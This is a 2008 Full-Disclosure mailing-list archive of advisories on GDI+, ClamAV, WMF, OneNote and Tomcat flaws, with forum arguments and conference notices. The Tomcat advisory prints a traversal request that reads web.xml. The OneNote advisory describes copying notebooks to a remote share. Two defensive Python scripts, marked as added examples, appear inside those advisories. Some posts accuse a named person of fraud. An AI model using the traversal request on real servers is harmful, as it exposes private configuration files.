Date: Tue, 09 Sep 2008 19:27:32 -0500
Subject: [Full-disclosure] iDefense Security Advisory 09.09.08: Microsoft Windows GDI+ Gradient Fill Heap Overflow Vulnerability
Message-ID: <48C71474.6030404@idefense.com>

iDefense Security Advisory 09.09.08
http://labs.idefense.com/intelligence/vulnerabilities/
Sep 09, 2008

I. BACKGROUND

The GDI+ library, or "GdiPlus.dll", provides access to a number of graphics methods, via a class-based API. Vector Markup Language (VML) is a component of the Extensible Markup Language (XML) that specifies vector images (e.g., rectangles and ovals) using the GDI+ API. For more information about these technologies, visit the following URLs.

http://msdn.microsoft.com/en-us/library/ms533797(VS.85).aspx
http://msdn.microsoft.com/en-us/library/ms533798(VS.85).aspx
http://www.w3.org/TR/1998/NOTE-VML-19980513
http://en.wikipedia.org/wiki/Vector_Markup_Language

II. DESCRIPTION

Remote exploitation of an integer overflow vulnerability in multiple versions of Microsoft Corp.'s GDI+ could allow an attacker to execute arbitrary code within the context of the local user.

The vulnerability specifically exists in the memory allocation performed by the GDI+ library.
Certain malformed gradient fill input can cause the application to corrupt the heap, potentially allowing arbitrary code execution.

III. ANALYSIS

Exploitation of this vulnerability may allow an attacker to execute arbitrary code in the context of the current user. To exploit this vulnerability, the attacker would need to convince a targeted user to render a document with an application that utilizes the vulnerable GDI+ functions. This could be accomplished by persuading the user to follow a link, view a document, or read an e-mail message.

IV. DETECTION

iDefense Labs confirmed this vulnerability affects Internet Explorer 7 and Internet Explorer 6 on the Microsoft Windows XP SP2 platform. The following versions of VGX.DLL were tested and found to be vulnerable:

7.00.6000.20628
7.00.6000.16386
6.00.2900.3051
6.00.2900.2997

While the VGX.DLL library (which handles VML) appears to be the most likely vector, Microsoft have indicated to us that the GdiPlus.dll is the root cause of the vulnerability. Version 5.1.3102.2180 of GdiPlus.dll was installed on each of the tested systems.

V. WORKAROUND

In order to prevent exploitation of this vulnerability, unregister or deny access to vgx.dll and/or gdiplus.dll. Note that doing so will prevent proper rendering of documents that rely on the affected component.

VI. VENDOR RESPONSE

Microsoft has officially addressed this vulnerability with Security Bulletin MS08-052. For more information, consult their bulletin at the following URL.

http://www.microsoft.com/technet/security/bulletin/ms08-052.mspx

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2007-5348 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems.

VIII. DISCLOSURE TIMELINE

05/09/2007  Initial vendor notification
05/09/2007  Initial vendor response
09/09/2008  Coordinated public disclosure

IX. CREDIT

This vulnerability was discovered by Greg MacManus during his tenure with iDefense Labs.
From xploitable at gmail.com Wed Sep 10 04:02:02 2008
From: xploitable at gmail.com (n3td3v)
Date: Wed, 10 Sep 2008 04:02:02 +0100
Subject: [Full-disclosure] McKinnon a 'scapegoat for Pentagon insecurity'
In-Reply-To: <21600.1220886960@turing-police.cc.vt.edu>
References: <4b6ee9310809051636g38329f5elb50c9ca3497683a6@mail.gmail.com> <4b6ee9310809051722w7a27f20dt33951319aed18ddb@mail.gmail.com> <4b6ee9310809061043i7536b628x4fac8077194cd452@mail.gmail.com> <8a6b8e350809071426ia10f292r2c98ebe74fc398ad@mail.gmail.com> <4b6ee9310809071457r31d967f2y16116fbccf4a2677@mail.gmail.com> <21600.1220886960@turing-police.cc.vt.edu>
Message-ID: <4b6ee9310809092002r1b1be75bmd7a26ae32d8f1dce@mail.gmail.com>

On Mon, Sep 8, 2008 at 4:16 PM, <Valdis.Kletnieks at vt.edu> wrote:
> For the record, although any single hacking case probably isn't the President's job, unless it's a highly visible one like the McKinnon case, the question of what policies/directives should be issued to deal with the general question *is* the President's job.
>

I'm talking about artificially ramping up something and giving a false impression to a president just so you can get power and money; that should be illegal. What Marcus Sachs said in the Youtube video sounds illegal. He wants to ramp up cyber security to make it something a president should worry about, even though in its natural state he knows it isn't one. Would that not come under some kind of fraud, to cheat and lie to a president to get money from him for something that doesn't actually need money in its natural state? Why should we let Marcus Sachs get away with it, when the evidence is on Youtube? Why don't the security community show the next administration the Youtube video, and then Marcus Sachs would have no chance of getting anything, because they will realise he is just lying and cheating, and ramping up cyber security to be something that it isn't.
All the best, n3td3v
--
https://groups.google.com/group/n3td3v

From yahoo at jimpop.com Wed Sep 10 05:21:33 2008
From: yahoo at jimpop.com (Jim Popovitch)
Date: Wed, 10 Sep 2008 00:21:33 -0400
Subject: [Full-disclosure] McKinnon a 'scapegoat for Pentagon insecurity'
In-Reply-To: <4b6ee9310809092002r1b1be75bmd7a26ae32d8f1dce@mail.gmail.com>
References: <4b6ee9310809051636g38329f5elb50c9ca3497683a6@mail.gmail.com> <4b6ee9310809051722w7a27f20dt33951319aed18ddb@mail.gmail.com> <4b6ee9310809061043i7536b628x4fac8077194cd452@mail.gmail.com> <8a6b8e350809071426ia10f292r2c98ebe74fc398ad@mail.gmail.com> <4b6ee9310809071457r31d967f2y16116fbccf4a2677@mail.gmail.com> <21600.1220886960@turing-police.cc.vt.edu> <4b6ee9310809092002r1b1be75bmd7a26ae32d8f1dce@mail.gmail.com>
Message-ID: <7ff145960809092121la2d567ey6bd109865e869d43@mail.gmail.com>

On Tue, Sep 9, 2008 at 23:02, n3td3v <xploitable at gmail.com> wrote:
> I'm talking about artificially ramping up something and giving a false
> impression...

You are talking/writing about two different things. Ramping up something is different than falsely describing ramping up something. I watched the video; I did not get the impression that Marcus was speaking about creating a falsehood.

-Jim P.
From xploitable at gmail.com Wed Sep 10 05:52:27 2008
From: xploitable at gmail.com (n3td3v)
Date: Wed, 10 Sep 2008 05:52:27 +0100
Subject: [Full-disclosure] [funsec] Internet attacks against Georgian web sites
In-Reply-To: <6158bb410809071841y7a5b3e4eqd9545bb608c3bef8@mail.gmail.com>
References: <20080818090256.4DD352003D@mailserver7.hushmail.com> <8f1f7b60808180543w18ce6ddasb2944db0a3298533@mail.gmail.com> <11005.1219073952@turing-police.cc.vt.edu> <1219077827.8558.51.camel@hextic-desktop> <48A9B2CA.4010602@fred.net> <1219090531.6511.0.camel@hextic-desktop> <4b6ee9310808281233x6132b469i1f9d035d25eb3639@mail.gmail.com> <4b6ee9310808281242n27ccee1cx4dabe5621d324ea9@mail.gmail.com> <6158bb410809071841y7a5b3e4eqd9545bb608c3bef8@mail.gmail.com>
Message-ID: <4b6ee9310809092152m309e733fh14e195c357b31f0b@mail.gmail.com>

On Mon, Sep 8, 2008 at 2:41 AM, Ureleet <ureleet at gmail.com> wrote:
> drink yourself to death. thank you.
>

Bush was an alcoholic as well, but that didn't stop him becoming president. It's just a shame that somebody lied to him and that Iraq happened. Don't lie to a president based on a false pretence!!! Maybe Marcus Sachs is listening and won't lie to a president about cyber security either.

All the best, n3td3v

> On Thu, Aug 28, 2008 at 3:42 PM, n3td3v <xploitable at gmail.com> wrote:
>> On Thu, Aug 28, 2008 at 8:33 PM, n3td3v <xploitable at gmail.com> wrote:
>>> Putin blames US for Georgia role
>>>
>>> Russian Prime Minister Vladimir Putin has accused the US of provoking
>>> the conflict in Georgia, possibly for domestic election purposes.
>>>
>>> Mr Putin told CNN US citizens were "in the area" during the conflict
>>> over South Ossetia and were "taking direct orders from their leaders".
>>>
>>> He said his defence officials had told him the provocation was to
>>> benefit one of the US presidential candidates.
>>>
>>> The White House dismissed the allegations as "not rational".
>>>
>>> http://news.bbc.co.uk/1/hi/world/europe/7586605.stm
>>>
>>
>> "The suspicion arises that someone in the United States especially
>> created this conflict with the aim of making the situation more tense
>> and creating a competitive advantage for one of the candidates
>> fighting for the post of US president."
>>
>> White House spokeswoman Dana Perino rejected the allegation.
>>
>> "To suggest that the United States orchestrated this on behalf of a
>> political candidate - it sounds not rational," she said.
>>
>> http://news.bbc.co.uk/1/hi/world/europe/7586605.stm
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>

From security at mandriva.com Wed Sep 10 06:04:01 2008
From: security at mandriva.com (security at mandriva.com)
Date: Tue, 09 Sep 2008 23:04:01 -0600
Subject: [Full-disclosure] [ MDVSA-2008:189 ] clamav
Message-ID: <E1KdHs1-0007XU-KE@titan.mandriva.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

Mandriva Linux Security Advisory                         MDVSA-2008:189
http://www.mandriva.com/security/
_______________________________________________________________________

Package : clamav
Date    : September 9, 2008
Affected: 2007.1, 2008.0, 2008.1, Corporate 3.0, Corporate 4.0
_______________________________________________________________________

Problem Description:

Multiple vulnerabilities were discovered in ClamAV and corrected with the 0.94 release, including:

A vulnerability in ClamAV's chm-parser allowed remote attackers to cause a denial of service (application crash) via a malformed CHM file (CVE-2008-1389).

A vulnerability in libclamav would allow attackers to cause a denial of service via vectors related to an out-of-memory condition (CVE-2008-3912).
Multiple memory leaks were found in ClamAV that could possibly allow attackers to cause a denial of service via excessive memory consumption (CVE-2008-3913).

A number of unspecified vulnerabilities in ClamAV were reported that have an unknown impact and attack vectors related to file descriptor leaks (CVE-2008-3914).

Other bugs have also been corrected in 0.94 which is being provided with this update. Because this new version has increased the major of the libclamav library, updated dependent packages are also being provided.
_______________________________________________________________________

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1389
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3912
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3913
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3914
_______________________________________________________________________

Updated Packages:
_______________________________________________________________________

To upgrade automatically use MandrivaUpdate or urpmi.
The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact security_(at)_mandriva.com
_______________________________________________________________________

Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team <security*mandriva.com>

From xploitable at gmail.com Wed Sep 10 07:14:25 2008
From: xploitable at gmail.com (n3td3v)
Date: Wed, 10 Sep 2008 07:14:25 +0100
Subject: [Full-disclosure] McKinnon a 'scapegoat for Pentagon insecurity'
In-Reply-To: <7ff145960809092121la2d567ey6bd109865e869d43@mail.gmail.com>
References: <4b6ee9310809051636g38329f5elb50c9ca3497683a6@mail.gmail.com> <4b6ee9310809051722w7a27f20dt33951319aed18ddb@mail.gmail.com> <4b6ee9310809061043i7536b628x4fac8077194cd452@mail.gmail.com> <8a6b8e350809071426ia10f292r2c98ebe74fc398ad@mail.gmail.com> <4b6ee9310809071457r31d967f2y16116fbccf4a2677@mail.gmail.com> <21600.1220886960@turing-police.cc.vt.edu> <4b6ee9310809092002r1b1be75bmd7a26ae32d8f1dce@mail.gmail.com> <7ff145960809092121la2d567ey6bd109865e869d43@mail.gmail.com>
Message-ID: <4b6ee9310809092314m3356282cu4488b067f1c234f7@mail.gmail.com>

On Wed, Sep 10, 2008 at 5:21 AM, Jim Popovitch <yahoo at jimpop.com> wrote:
> On Tue, Sep 9, 2008 at 23:02, n3td3v <xploitable at gmail.com> wrote:
>> I'm talking about artificially ramping up something and giving a false
>> impression...
>
> You are talking/writing about two different things.
> Ramping up
> something is different than falsely describing ramping up
> something. I watched the video, I did not get the impression that
> Marcus was speaking about creating a falsehood.
>
> -Jim P.
>

I think he is going to lie to a president about the severity of the threat, just like somebody lied to Bush about the severity of the threat posed by Iraq. Don't make the same mistake twice; learn our lessons from Iraq and move forward. Lying about the threat isn't cool, just so you can get money from the next administration. If the next president starts thinking cyber security is an imminent threat to national security, then who knows where we are going to end up. An unnecessary cyber war with other countries or cyber terrorists or both, all because of a greedy Marcus Sachs and a false pretence? Please don't do it Marcus, don't do it Marcus!!! Setting up US-CERT was enough for you to achieve, Marcus; now leave it at that and go take up a new hobby. Don't ramp up cyber security as a national security item.

Definitions of fraud on the Web:
http://www.google.com/search?hl=en&safe=off&pwst=1&defl=en&q=define:fraud&sa=X&oi=glossary_definition&ct=title

All the best, n3td3v

From VR-Subscription-noreply at assurent.com Tue Sep 9 18:30:34 2008
From: VR-Subscription-noreply at assurent.com (VR-Subscription-noreply at assurent.com)
Date: Tue, 9 Sep 2008 13:30:34 -0400 (EDT)
Subject: [Full-disclosure] Assurent VR - Microsoft Windows Graphics Rendering Engine WMF Parsing Buffer Overflow
Message-ID: <20080909173034.70C6268019F@sticky.vrt.telus.com>

Microsoft Windows Graphics Rendering Engine WMF Parsing Buffer Overflow

Assurent ID: FSC20080909-12

1. Affected Software

Digital Image Suite 2006
Forefront Client Security 1.0
Microsoft Office 2003 SP2, SP3
Microsoft Office PowerPoint Viewer 2003
Microsoft Windows XP prior to SP3
Microsoft Windows Vista
Microsoft Windows Server 2003
Microsoft Windows Server 2008
Microsoft Works 8

Reference: http://www.microsoft.com/

2.
Vulnerability Summary

A vulnerability has been discovered in the Graphics Rendering Engine (GRE) component of Microsoft Windows. Specifically, this vulnerability is exposed by the Microsoft Windows GDI+ subsystem. The vulnerability is created by an error in parsing certain Windows Metafile (WMF) files, a standard image file format used by many commonly-used software applications.

3. Vulnerability Analysis

A remote attacker may exploit the vulnerability by sending a malicious WMF file to the target system and enticing the target user to view or preview it. A successful code execution attempt will result in arbitrary code being executed with the security privileges of the currently logged-in user. An unsuccessful attack attempt will result in abnormal termination of the program used for opening the malicious file.

Applications affected by this vulnerability include Windows Explorer, Internet Explorer, Microsoft Paint, Windows Picture and Fax Viewer, and various Microsoft Office products. Note that the vulnerable file may be embedded inside other formats in the form of OLE objects, allowing the malicious file to appear as an RTF file, a Microsoft Office document, or another format.

4. Vulnerability Detection

Assurent has confirmed the vulnerability in:

Digital Image Suite 2006
Forefront Client Security 1
Microsoft Office 2003 SP2, SP3
Microsoft Office PowerPoint Viewer 2003
Microsoft Windows XP prior to SP3
Microsoft Windows Vista
Microsoft Windows Server 2003
Microsoft Windows Server 2008
Microsoft Works 8

5. Workaround

Apply the vendor patch, remove file associations to WMF files to avoid opening them, disable thumbnail previews while browsing files, or block the downloading of WMF resources from untrusted networks.

6. Vendor Response

Microsoft has released a bulletin addressing this vulnerability.

Reference: http://www.microsoft.com/technet/security/Bulletin/MS08-052.mspx

7.
Disclosure Timeline

2007-03-20 Reported to vendor
2007-03-22 Initial vendor response
2008-09-09 Coordinated public disclosure

8. Credits

Vulnerability Research Team, Assurent Secure Technologies, a TELUS company

9. References

CVE: CVE-2008-3014
Vendor: MS08-052

10. About Assurent VRS

Assurent's Vulnerability Research Service (VRS) for security product vendors, and Threat Protection Programs (TPP) for MSPs and enterprise security teams, help to eliminate the significant costs incurred by security product vendors, MSPs, and enterprise security teams in responding to and managing critical new security vulnerabilities and other threats, including worm and virus outbreaks and other malware. The VRS and TPP services are real-time feeds providing subscribers with detailed analysis of the top security vulnerabilities, focused on the specific needs of each group of customers.

http://www.assurent.com/index.php?id=17

From brett.moore at insomniasec.com Tue Sep 9 23:16:43 2008
From: brett.moore at insomniasec.com (Brett Moore)
Date: Wed, 10 Sep 2008 10:16:43 +1200
Subject: [Full-disclosure] Insomnia : ISVA-080910.1 - MS Office OneNote URL Handling Vulnerability
Message-ID: <005c01c912c9$c161d330$44257990$@moore@insomniasec.com>

__________________________________________________________________
Insomnia Security Vulnerability Advisory: ISVA-080910.1
___________________________________________________________________

Name: MS Office OneNote URL Handling Vulnerability
Released: 10 September 2008
Vendor Link: http://office.microsoft.com/onenote
Affected Products:
  MS Office OneNote 2007
  MS Office 2003 and 2007 have vulnerable components
Original Advisory: http://www.insomniasec.com/advisories/ISVA-080910.1.htm
Researcher: Brett Moore, Insomnia Security http://www.insomniasec.com
___________________________________________________________________

_______________
Description
_______________

OneNote is included as part of Office 2007, and provides an easy way to store, manage, and
share information.

OneNote installs a URL Handler under the registry key HKEY_CLASSES_ROOT\OneNote with an open command specified as

C:\PROGRA~1\MICROS~2\Office12\ONENOTE.EXE /hyperlink "%1"

Due to the URL Handler, OneNote can be started from Internet Explorer through a URI reference of

onenote://onenotefile

where onenotefile is a locally hosted file, or a file accessible through a UNC/WebDAV share. The instance of OneNote started will be executed through the IEUSER.EXE process running under the currently logged-in user.

OneNote is one of the few Microsoft-installed applications that does NOT PROMPT the user before executing from the URL.

Through the use of command line switches passed to OneNote from a URL, we found two exploitation scenarios.

_______________
Details
_______________

- File Transfer to Client -

OneNote accepts a command switch to specify the location of the local cache directory. By specifying this switch on the URL, it is possible to specify an arbitrary location on the client, which will be used to cache the opened notebooks. If a notebook is loaded from a remote share, a local copy will be created under the cache directory.

When OneNote caches the notebook it makes a local copy of any binary files that are embedded inside the notebook. This allows the placement of binary files in a 'semi-arbitrary' location that can then be used in conjunction with social engineering emails, or other attacks that require knowledge of the location of a file. There may also be other attack vectors through the placement of specially named files within search paths.

- Theft of Users' OneNote Notebooks -

OneNote accepts a command switch to specify the location of the backup directory. It is possible to specify an SMB share location on a remote server, which will be used to back up the notebooks. This results in copies of all opened notebooks being sent to the remote share.
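As an added example (not Insomnia's or Microsoft's code), the following Python script inventories the URL protocol handlers registered under HKEY_CLASSES_ROOT, the mechanism by which the OneNote handler above is wired to Internet Explorer, and reports the executable and fixed switches each handler will run so an administrator can review what a link is able to launch on a workstation. It assumes only the standard handler layout (a "URL Protocol" value on the key plus a shell\open\command); on a non-Windows host the registry walk returns nothing and the OneNote command quoted in the advisory is parsed instead.

```python
"""Inventory of URL protocol handlers registered on a Windows host.

Added example for the OneNote advisory; not Insomnia's or Microsoft's code. A
scheme such as onenote:// is registered as an HKEY_CLASSES_ROOT key carrying a
"URL Protocol" value and a shell\\open\\command whose "%1" receives the URL.
This lists those handlers with the executable and fixed switches each will run,
so an administrator can review what a link in the browser is able to launch.
The parsing is pure Python; the registry walk needs Windows, [] elsewhere.
"""
import re

# The OneNote open command quoted in the advisory.
ONENOTE_COMMAND = r'C:\PROGRA~1\MICROS~2\Office12\ONENOTE.EXE /hyperlink "%1"'

# A token is either a double-quoted string (kept whole) or a run of non-blanks.
_TOKEN_RE = re.compile(r'"[^"]*"|\S+')


def parse_open_command(command: str):
    """Split a shell\\open\\command string into (executable, argument tokens).

    Quotes around the executable are stripped; quotes around arguments are
    kept so that a quoted "%1" stays distinguishable from a bare %1.
    """
    tokens = _TOKEN_RE.findall(command.strip())
    if not tokens:
        return "", []
    return tokens[0].strip('"'), tokens[1:]


def summarize_handler(scheme: str, command: str) -> dict:
    """Describe one handler: what runs, which switches are hard-wired in the
    registry, and whether the URL is passed on the command line at all."""
    exe, args = parse_open_command(command)
    return {
        "scheme": scheme,
        "executable": exe,
        "switches": [a for a in args if a.startswith(("/", "-"))],
        "url_passed": any("%1" in a for a in args),
    }


def list_url_handlers() -> list:
    """Return (scheme, open command) for every HKCR key that declares a
    "URL Protocol" value. Needs Windows; returns [] on other platforms."""
    try:
        import winreg
    except ImportError:
        return []
    handlers, index = [], 0
    while True:
        try:
            name = winreg.EnumKey(winreg.HKEY_CLASSES_ROOT, index)
        except OSError:
            break  # past the last subkey
        index += 1
        try:
            with winreg.OpenKey(winreg.HKEY_CLASSES_ROOT, name) as key:
                winreg.QueryValueEx(key, "URL Protocol")  # raises if absent
            command = winreg.QueryValue(winreg.HKEY_CLASSES_ROOT,
                                        name + r"\shell\open\command")
        except OSError:
            continue  # not a URL handler, or it has no open command
        handlers.append((name, command))
    return handlers


def audit(handlers=None) -> list:
    """Summaries for each handler, sorted by scheme name."""
    if handlers is None:
        handlers = list_url_handlers()
    return sorted((summarize_handler(s, c) for s, c in handlers),
                  key=lambda h: h["scheme"].lower())


if __name__ == "__main__":
    # Off Windows, fall back to the single entry quoted in the advisory.
    found = list_url_handlers() or [("OneNote", ONENOTE_COMMAND)]
    for h in audit(found):
        print(f'{h["scheme"]:<16} {h["executable"]}  switches={h["switches"]}  '
              f'url_passed={h["url_passed"]}')
```

Handlers that pass the URL to a program which itself parses switches, as the advisory describes for OneNote, are the ones to review first; the script cannot tell that from the registry alone.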
_______________
Solution
_______________

Microsoft have released a security update to address this issue:
http://www.microsoft.com/technet/security/bulletin/ms08-055.mspx

_______________
Legals
_______________

The information is provided for research and educational purposes only. Insomnia Security accepts no liability in any form whatsoever for any direct or indirect damages associated with the use of this information.

___________________________________________________________________
Insomnia Security Vulnerability Advisory: ISVA-080910.1
___________________________________________________________________

From markt at apache.org Wed Sep 10 11:06:27 2008
From: markt at apache.org (Mark Thomas)
Date: Wed, 10 Sep 2008 11:06:27 +0100
Subject: [Full-disclosure] [SECURITY] CVE-2008-2938 - Apache Tomcat information disclosure vulnerability - Updated
Message-ID: <48C79C23.3090108@apache.org>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

CVE-2008-2938: Apache Tomcat information disclosure vulnerability - Updated

Severity: Important (was moderate)

Vendor: The Apache Software Foundation

Versions Affected:
Tomcat 4.1.0 to 4.1.37
Tomcat 5.5.0 to 5.5.26
Tomcat 6.0.0 to 6.0.16
The unsupported Tomcat 3.x, 4.0.x and 5.0.x versions may also be affected

Description (new information):
Further investigation of CVE-2008-2938 has shown that the vulnerability also exists with only URIEncoding="UTF-8" set on the connector. In these configurations arbitrary files in the docBase for an application, including files such as web.xml, may be disclosed.
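The decoding behaviour behind this finding, as an added example that is not part of the advisory and is not Tomcat code: the request path in this advisory's Example uses %c0%ae, an overlong two-byte UTF-8 encoding of '.'. The block shows that a conforming decoder rejects it, that a decoder without a shortest-form check turns %c0%ae%c0%ae into '..', that a traversal check made on the raw (undecoded) path sees nothing wrong, and how to scan access-log lines for such escapes. The log lines, client addresses and timestamps are constructed.

```python
"""Overlong UTF-8 in request paths: strict vs. lenient decoding, plus log scanning.

Added example for the Tomcat advisory; not Tomcat code and not a model of its
internals. %c0%ae (from the advisory's example URL) is an overlong two-byte form
of '.': a strict decoder rejects it, a lenient one turns %c0%ae%c0%ae into '..',
and a traversal check made on the raw, undecoded path sees nothing wrong.
"""
import re
from urllib.parse import unquote_to_bytes

# Path from the advisory's example URL, host part dropped.
EXAMPLE_PATH = "/contextpath/%c0%ae%c0%ae/WEB-INF/web.xml"


def lenient_utf8_decode(data: bytes) -> str:
    """Decode UTF-8 without the shortest-form (overlong) check a conforming
    decoder performs. Deliberately defective; malformed bytes become U+FFFD."""
    out, i = [], 0
    while i < len(data):
        b = data[i]
        if b < 0x80:
            out.append(chr(b))
            i += 1
            continue
        if 0xC0 <= b <= 0xDF:
            n, cp = 1, b & 0x1F
        elif 0xE0 <= b <= 0xEF:
            n, cp = 2, b & 0x0F
        elif 0xF0 <= b <= 0xF7:
            n, cp = 3, b & 0x07
        else:
            out.append("\ufffd")
            i += 1
            continue
        tail = data[i + 1:i + 1 + n]
        if len(tail) != n or any(not 0x80 <= t <= 0xBF for t in tail):
            out.append("\ufffd")
            i += 1
            continue
        for t in tail:
            cp = (cp << 6) | (t & 0x3F)
        # No shortest-form check here: 0xC0 0xAE yields cp == 0x2E, i.e. '.'
        out.append(chr(cp) if cp <= 0x10FFFF else "\ufffd")
        i += 1 + n
    return "".join(out)


def decode_path(raw_path: str, strict: bool):
    """Percent-decode a request path, then interpret the bytes as UTF-8.
    strict=True uses Python's conforming decoder and returns None for invalid
    UTF-8 (reject the request); strict=False uses the lenient decoder above."""
    data = unquote_to_bytes(raw_path)
    if strict:
        try:
            return data.decode("utf-8")
        except UnicodeDecodeError:
            return None
    return lenient_utf8_decode(data)


def contains_traversal(path: str) -> bool:
    """True if any '/'-separated segment of the path is '..'."""
    return any(seg == ".." for seg in path.split("/"))


# Percent-escape patterns that can only be overlong UTF-8 sequences.
OVERLONG_RE = re.compile(
    r"%c[01]%[89ab][0-9a-f]"                          # 2-byte form of U+0000..U+007F
    r"|%e0%[89][0-9a-f]%[89ab][0-9a-f]"               # 3-byte form of U+0000..U+07FF
    r"|%f0%8[0-9a-f]%[89ab][0-9a-f]%[89ab][0-9a-f]",  # 4-byte form of U+0000..U+FFFF
    re.IGNORECASE,
)


def find_overlong_escapes(line: str) -> list:
    """Every overlong percent-escape sequence in one access-log line, lowercased."""
    return [m.lower() for m in OVERLONG_RE.findall(line)]


def scan_log(lines) -> list:
    """(line_index, matches) for each line that carries an overlong escape."""
    hits = []
    for index, line in enumerate(lines):
        found = find_overlong_escapes(line)
        if found:
            hits.append((index, found))
    return hits


# Constructed access-log lines (Common Log Format); not from any real server.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Sep/2008:11:06:27 +0100] "GET /contextpath/index.jsp HTTP/1.1" 200 512',
    '10.0.0.5 - - [10/Sep/2008:11:06:29 +0100] "GET /contextpath/%c0%ae%c0%ae/WEB-INF/web.xml HTTP/1.1" 200 2048',
    '10.0.0.7 - - [10/Sep/2008:11:07:01 +0100] "GET /contextpath/caf%c3%a9.html HTTP/1.1" 404 301',
]

if __name__ == "__main__":
    print("raw path contains '..':", contains_traversal(EXAMPLE_PATH))
    print("lenient decode:        ", decode_path(EXAMPLE_PATH, strict=False))
    print("strict decode:         ", decode_path(EXAMPLE_PATH, strict=True))
    print("log lines with overlong escapes:", scan_log(SAMPLE_LOG))
```

The third sample line carries a valid two-byte sequence (%c3%a9, "é") and is not flagged, so the scan distinguishes legitimate non-ASCII paths from overlong ones.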
Users should also be aware that this vulnerability will apply when processing requests with UTF-8 body encoding and useBodyEncodingForURI="true".

Mitigation:
6.0.x users should upgrade to 6.0.18
5.5.x users should upgrade to 5.5.27
4.1.x users should obtain the latest source from svn or apply this patch:
http://svn.apache.org/viewvc?view=rev&revision=681065

Example:
http://www.target.com/contextpath/%c0%ae%c0%ae/WEB-INF/web.xml

Credit:
This additional information was discovered by the Apache Tomcat security team.

References:
http://tomcat.apache.org/security.html

Mark Thomas

From walter.kovacs at rocketmail.com Wed Sep 10 11:33:00 2008
From: walter.kovacs at rocketmail.com (Walter Kovacs)
Date: Wed, 10 Sep 2008 03:33:00 -0700 (PDT)
Subject: [Full-disclosure] Don't Let Your Kids Go Online Unsupervised
Message-ID: <112885.89005.qm@web59716.mail.ac4.yahoo.com>

RJ Carter discusses online predators, child safety, and parent resources in regards to the online activity of unsupervised children on YouTube and other sites. For more info:
http://therjcarter.wordpress.com/youtube-pedophile-playground/
http://rjcarter.blogspot.com

Irish282, LoganSperman2, YouTube, Pedophile Playground

From 2008 at hack.lu Wed Sep 10 12:51:08 2008
From: 2008 at hack.lu (hack.lu 2008)
Date: Wed, 10 Sep 2008 13:51:08 +0200
Subject: [Full-disclosure] Hack.lu 2008 update
Message-ID: <48C7B4AC.7060805@hack.lu>

Hi all,

Hack.lu 2008 is getting closer and closer.
Find hereafter the line-up of speakers and talks for this year's event:

Saumil Shah - Browser Exploits - A new model for Browser security
Roelof Temmingh - Investigating individuals and groups using open source intelligence
Paul Craig - Hacking Internet Kiosks
Adrian Pastor - Cracking into embedded devices and beyond!
Julien Lenoir, Christophe Devaux - Browsers Rootkits
F.W.J. van Geelkerken - Egregious use of TOR servers
Jean-Baptiste Bédrune - Analysis of an undocumented network protocol
Damien Aumaitre - A little journey inside Windows memory
Philippe Teuwen - How to make smartcards resistant to hackers' lightsabers?
Patrick Hof, Jens Liebchen - Bridging the Gap between the Enterprise and You - or - Who's the JBoss now?
Ezequiel David Gutesman - gFuzz: An Instrumented Web Application Fuzzing Environment
Frank Boldewin - Rustock.C - When a myth comes true
Joffrey Czarny - Go outside citrix context
Sebastian Wilhelm Maier - "The end of the internet" aka "Self replicating malware on home routers"
Philippe Langlois - Immersed network discovery and attacks, specifics of telecom Core Network (CN SS7/SIGTRAN) insider attacks
Dumitru Codreanu - Server-side virus scanning
Mihai Chiriac - Anti-virus 2.0 - "Compilers in disguise"
Eric Michel Leblond, Vincent Deffontaines, Sebastien Tricaud - User Authentication at the Firewall level
Eric Filiol - Malware of the future: when mathematics works for the dark side

You can read more about the talks here:
http://www.hack.lu/index.php/hl/2008/schedConf/presentations

The final agenda will follow during the next days. There will also be a wiki at wiki.hack.lu for the Hackcamp that runs in parallel to the hack.lu conference.

Feel free to register at:
http://www.hack.lu/index.php/hl/2008/schedConf/registration

For hotel reservation please fill out the form you can find at www.hack.lu and send it to the hotel.

Stay tuned to the website and wiki as there will be regular updates.
Hope to see you in October in Luxembourg.

cheers
the CSRRT-Lu team

From deepsec at deepsec.net Wed Sep 10 11:51:32 2008
From: deepsec at deepsec.net (DeepSec Conference Vienna)
Date: Wed, 10 Sep 2008 12:51:32 +0200 (CEST)
Subject: [Full-disclosure] DeepSec 2008 - Conference Schedule
Message-ID: <20080910105132.EFF89DF20B@bazaar.foomatic.at>

The DeepSec In Depth Security Conference is happy to announce the preliminary schedule for this year's event from November 11th to 14th in Vienna, Austria.

The schedule, which can be found at https://deepsec.net/schedule, offers bleeding edge talks from international speakers on topics including botnet analysis, web application security, malware detection, legal and administrative issues, secure coding and code review, hardware and firmware attacks, and more.

Registration is open at: https://deepsec.net/register/

In addition to the two day conference we offer two days of in-depth workshops on selected topics:

* Improving Code with Destructive Data (Heikki Kortti and Jukka Taimisto)
* Security Audit and Hardening of Java based Software (Marc Schoenefeld)
* The Exploit Laboratory (Saumil Udayan Shah)
* Design and Implementation of Security Awareness Campaigns (Stefan Schumacher)
* Advanced Malware Deobfuscation (Scott Lambert)
* Protocol and Traffic Analysis for Snort Signature (Matt Jonkman)
* Secure Application Coding for Enterprise Software (Vimal Patel)

List of speakers with presentations:

* Achim Reckeweg ; Sun Microsystems ; Germany
* Alex Stamos ; iSEC Partners ; USA
* Alexander Kornbrust ; Red Database Security GmbH ; Germany
* Andrea Monti ; Studio Legale Monti ; Italy
* Arrigo Triulzi ; Independent Security Consultant ; Italy
* Chema Alonso, José Parada ; Informática 64 ; Spain
